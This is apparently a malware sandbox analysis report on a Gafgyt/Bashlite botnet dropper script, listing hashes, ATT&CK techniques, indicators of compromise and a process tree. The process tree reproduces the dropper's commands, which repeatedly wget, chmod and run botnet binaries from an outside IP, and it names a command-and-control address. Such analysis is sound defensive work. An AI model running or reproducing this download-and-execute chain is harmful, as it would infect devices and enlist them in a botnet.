gafgyt | 930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b

Analysis

max time kernel
3s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
06/03/2025, 04:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
Size

1KB
MD5

a23e61b3d2822d367944ad0bb171348e
SHA1

024cfb180037b542aaad41dd8330f0d797d34bc3
SHA256

930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b
SHA512

ebc46985695c7fce429f8f4a30fc51f151724ef9114a172c240433d1baf85c49e81f505eb54039de0f835ee57a387b04cf2bd7f43ff02fc75336837bf093ce5b

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

45.148.10.136:666

Signatures

Detected Gafgyt variant 1 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 12 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1529	chmod
1534	chmod
1542	chmod
1505	chmod
1510	chmod
1547	chmod
1552	chmod
1557	chmod
1486	chmod
1500	chmod
1517	chmod
1522	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/jew.mips	1487	930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh

Changes its process name 3 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	1511	jew.x86
Changes the process name, possibly in an attempt to hide itself	1523	930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
Changes the process name, possibly in an attempt to hide itself	1535	930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1482	wget
1487	jew.mips
1489	rm

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jew.mips	wget
File opened for modification	/tmp/jew.mpsl	wget
File opened for modification	/tmp/jew.x86	wget
File opened for modification	/tmp/jew.x32	wget
File opened for modification	/tmp/jew.ppc	wget
File opened for modification	/tmp/jew.m68k	wget
File opened for modification	/tmp/jew.sh4	wget
File opened for modification	/tmp/jew.arm6	wget
File opened for modification	/tmp/jew.i586	wget
File opened for modification	/tmp/jew.ppc	wget
File opened for modification	/tmp/jew.arm4	wget

/tmp/930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
/tmp/930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
1⤵
- Executes dropped EXE
- Changes its process name
PID:1481
- /usr/bin/wget
  wget http://45.148.10.136/jew.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1482
- /bin/chmod
  chmod +x jew.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1486
- /tmp/jew.mips
  ./jew.mips
  2⤵
  - System Network Configuration Discovery
  PID:1487
- /bin/rm
  rm -rf jew.mips
  2⤵
  - System Network Configuration Discovery
  PID:1489
- /usr/bin/wget
  wget http://45.148.10.136/jew.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1490
- /bin/chmod
  chmod +x jew.mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:1500
- /tmp/jew.mpsl
  ./jew.mpsl
  2⤵
  PID:1501
- /bin/rm
  rm -rf jew.mpsl
  2⤵
  PID:1503
- /usr/bin/wget
  wget http://45.148.10.136/jew.sh4
  2⤵
  - Writes file to tmp directory
  PID:1504
- /bin/chmod
  chmod +x jew.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:1505
- /tmp/jew.sh4
  ./jew.sh4
  2⤵
  PID:1506
- /bin/rm
  rm -rf jew.sh4
  2⤵
  PID:1508
- /usr/bin/wget
  wget http://45.148.10.136/jew.x86
  2⤵
  - Writes file to tmp directory
  PID:1509
- /bin/chmod
  chmod +x jew.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1510
- /tmp/jew.x86
  ./jew.x86
  2⤵
  - Changes its process name
  PID:1511
- /bin/rm
  rm -rf jew.x86
  2⤵
  PID:1514
- /usr/bin/wget
  wget http://45.148.10.136/jew.arm6
  2⤵
  - Writes file to tmp directory
  PID:1516
- /bin/chmod
  chmod +x jew.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1517
- /tmp/jew.arm6
  ./jew.arm6
  2⤵
  PID:1518
- /bin/rm
  rm -rf jew.arm6
  2⤵
  PID:1520
- /usr/bin/wget
  wget http://45.148.10.136/jew.x32
  2⤵
  - Writes file to tmp directory
  PID:1521
- /bin/chmod
  chmod +x jew.x32
  2⤵
  - File and Directory Permissions Modification
  PID:1522
- /bin/rm
  rm -rf jew.x32
  2⤵
  PID:1526
- /usr/bin/wget
  wget http://45.148.10.136/jew.ppc
  2⤵
  - Writes file to tmp directory
  PID:1528
- /bin/chmod
  chmod +x jew.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1529
- /tmp/jew.ppc
  ./jew.ppc
  2⤵
  PID:1530
- /bin/rm
  rm -rf jew.ppc
  2⤵
  PID:1532
- /usr/bin/wget
  wget http://45.148.10.136/jew.i586
  2⤵
  - Writes file to tmp directory
  PID:1533
- /bin/chmod
  chmod +x jew.i586
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /bin/rm
  rm -rf jew.i586
  2⤵
  PID:1538
- /usr/bin/wget
  wget http://45.148.10.136/jew.m68k
  2⤵
  - Writes file to tmp directory
  PID:1540
- /bin/chmod
  chmod +x jew.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1542
- /tmp/jew.m68k
  ./jew.m68k
  2⤵
  PID:1543
- /bin/rm
  rm -rf jew.m68k
  2⤵
  PID:1545
- /usr/bin/wget
  wget http://45.148.10.136/jew.ppc
  2⤵
  - Writes file to tmp directory
  PID:1546
- /bin/chmod
  chmod +x jew.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1547
- /tmp/jew.ppc
  ./jew.ppc
  2⤵
  PID:1548
- /bin/rm
  rm -rf jew.ppc
  2⤵
  PID:1550
- /usr/bin/wget
  wget http://45.148.10.136/jew.arm4
  2⤵
  - Writes file to tmp directory
  PID:1551
- /bin/chmod
  chmod +x jew.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:1552
- /tmp/jew.arm4
  ./jew.arm4
  2⤵
  PID:1553
- /bin/rm
  rm -rf jew.arm4
  2⤵
  PID:1555
- /usr/bin/wget
  wget http://45.148.10.136/jew.arm5
  2⤵
  PID:1556
- /bin/chmod
  chmod +x jew.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:1557
- /tmp/jew.arm5
  ./jew.arm5
  2⤵
  PID:1558
- /bin/rm
  rm -rf jew.arm5
  2⤵
  PID:1559

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jew.mips

Filesize
133KB

MD5
a328b683ab2e102306ce558ac2848bc0

SHA1
8e4ca556c8ac6483a4f496736cd6efb645732d13

SHA256
596c2174f15304ad6029db214b0f4b5ebb97552be7f9d9a170fe03bbc7c762c1

SHA512
8452bcd476ca2f27529fbfa95ed7eb348d0448350857039d7fbf26be21df34084222790becbd00ba6875417ae7f527e9e16c2ff8b6ea4f9a1330bf8b8ddd4505

Download Submit